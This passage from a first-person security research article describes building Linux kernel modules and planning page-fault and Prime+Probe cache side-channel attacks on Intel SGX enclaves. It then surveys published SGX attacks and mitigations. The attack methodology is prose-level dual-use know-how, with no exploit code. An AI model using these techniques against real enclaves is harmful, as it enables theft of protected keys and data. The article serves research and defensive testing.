        acc |= tbl[i] & (uint32_t)(-(int32_t)(i == secret));
    return acc;
}

Kernel programming

To build any of this into a hostile kernel I had to learn module development. I forked torvalds/linux, then wrote small modules against linux/kernel.h and linux/module.h, built them out-of-tree against the running kernel's headers, loaded them with insmod and read their output with dmesg. My first working module was a probe that logged every invocation of a given command:

obj-m += sgxwatch.o
KDIR  ?= /lib/modules/$(shell uname -r)/build

all:
	$(MAKE) -C $(KDIR) M=$(PWD) modules

load: all
	sudo insmod sgxwatch.ko && sudo dmesg -w

Two practical notes from that period, both learned expensively. A module that loads at boot comes from /etc/modules-load.d/ or from being built into the kernel image , not from copying .ko files into a source tree. And a bad module panics the machine instantly: I was working on a shared lab server over SSH, and the right answer is to develop against a VM with a snapshot, not against hardware other people depend on.

Also worth knowing before attempting the classic approach: modern kernels do not let you rewrite the syscall table. It is write-protected, sys_call_table is no longer exported, and lockdown plus module signing tighten it further. The supported instrumentation points are kprobes, ftrace hooks and eBPF , which is what a serious version of this project uses anyway, since they are both more stable and less likely to take the box down.

The attack plan

Assembled, the plan was:

  1. A module that detects enclave creation on the SGX driver's ioctl path, and records ELRANGE for the target PID at EINIT.
  2. On detection, manipulate the page tables for that range , clear present bits, handle the resulting faults, log the page-aligned CR2, ERESUME , to reconstruct the page-access trace.
  3. In parallel, a Prime+Probe module timing cache-set evictions across enclave execution, to recover the data-dependent indices the page trace is too coarse to see.

The two channels are complementary: the page trace gives you deterministic control flow at 4 KB, the cache trace gives you noisy data access at 64 B.

Results

Over two months, both halves of the mission produced working artefacts.

On the defensive side, the application shipped and ran: a TLS server holding its signing key, its key-agreement material and its record plaintext inside an enclave, an encrypted-at-rest queue with sequence numbers bound into the AEAD tags, a client with key pinning, a live web interface, and a pentest of my own work , Nmap, a MITM position under Wireshark, and fuzzing , that found a fingerprinting weakness I then fixed. That went beyond the original brief, which asked only for a key-generating server with secure packet exchange.

On the offensive side, every building block of the malicious kernel was reverse-engineered and prototyped:

  • The enclave creation sequence, fully mapped , from mmap through ECREATE, the EADD/EEXTEND batches and EINIT, down to the individual driver ioctl codes. That let me build a reliable detector, and a kprobe on the driver's ioctl path turned out to be a much cleaner trigger than the syscall pattern-matching I had originally planned.
  • A working set of kernel modules , syscall probes, the SGX driver hook, and the page-table walk needed to revoke and restore present bits with the right TLB handling.
  • Both leakage primitives demonstrated on real hardware , a controlled-channel path via page faults, and a cache-timing attack that recovered a secret held by an enclave through its access pattern.

What I ran out of time for was the last assembly step: wiring the detector, the fault handler and the cache probe into a single kernel that attacks an enclave end to end, unattended. The pieces exist and are understood individually; combining them was two months of work away, not a dead end.

The lab came out of it with something it did not have before: a documented map of SGX's attack surface from the offensive side, with a reproducible method behind each entry. And I came out of it able to take an arbitrary SGX application and test it for the same weaknesses , which was the skill the mission was really about.

State of the art, and where SGX stands now

The attacks that shaped the field, roughly in order of how badly they hurt:

  • Controlled-channel (2015) , page-fault traces; deterministic, noise-free.
  • Cache attacks , CacheZoom, Prime+Probe on L1/LLC; key recovery from enclaved crypto.
  • Foreshadow (L1TF, 2018) , speculative reads of L1 dumped enclave secrets in plaintext and, worse, allowed forging attestation quotes. Fixed in microcode with a TCB recovery.
  • Plundervolt (2019) , software-controlled undervolting to inject faults into in-enclave AES-NI and multiplications.
  • SGAxe / CrossTalk (2020) , attestation key extraction; cross-core leakage through the staging buffer.
  • ÆPIC Leak (2022) , architecturally-exposed stale data, no side channel needed.
  • LVI (2020) and Downfall (2023) , injection-side transient execution, and gather-based leakage.

Intel's position throughout has been consistent and, read carefully, defensible: side channels are outside the SGX threat model, and enclave authors are expected to write constant-time, data-oblivious code. Whether that is a reasonable expectation of application developers is the interesting argument, and it is why mitigation research went towards compiler and runtime approaches (T-SGX, Varys, Cloak, Déjà Vu) rather than hardware fixes.

The deployment picture has changed too. Intel deprecated SGX on client CPUs from 11th/12th-gen Core onwards; it now lives on Xeon E and Xeon Scalable, where the redesign lifted the EPC from roughly 128 MB to 512 GB per socket. SGX2 added EDMM for dynamic enclave memory. Meanwhile the centre of gravity for confidential computing has shifted from process-level enclaves towards VM-level TEEs , Intel TDX, AMD SEV-SNP, ARM CCA , partly because the enclave programming model is genuinely hard to use correctly, and everything in Part 1 of this article is evidence for that.

Takeaways

SGX does exactly what it says on the tin, and that turns out to be narrower than people assume. The direct attacks , read the memory, DMA it, tap the bus , are all closed properly, and abort page semantics are an elegant way to do it. But the CPU still has one branch predictor, one TLB, one cache hierarchy and one page-table walker under the attacker's control, and the enclave's behaviour is visible through all of them.

The mental model that makes both halves of this click is the privilege relationship: the enclave is passive, and the untrusted kernel does all the work of building, mapping and scheduling it. Once you hold that the right way round, the guarantees and the attacks both fall out of it , the kernel cannot read enclave memory, but it decides what is mapped, when execution is interrupted, and what shares the cache. That is more than enough to work with.

References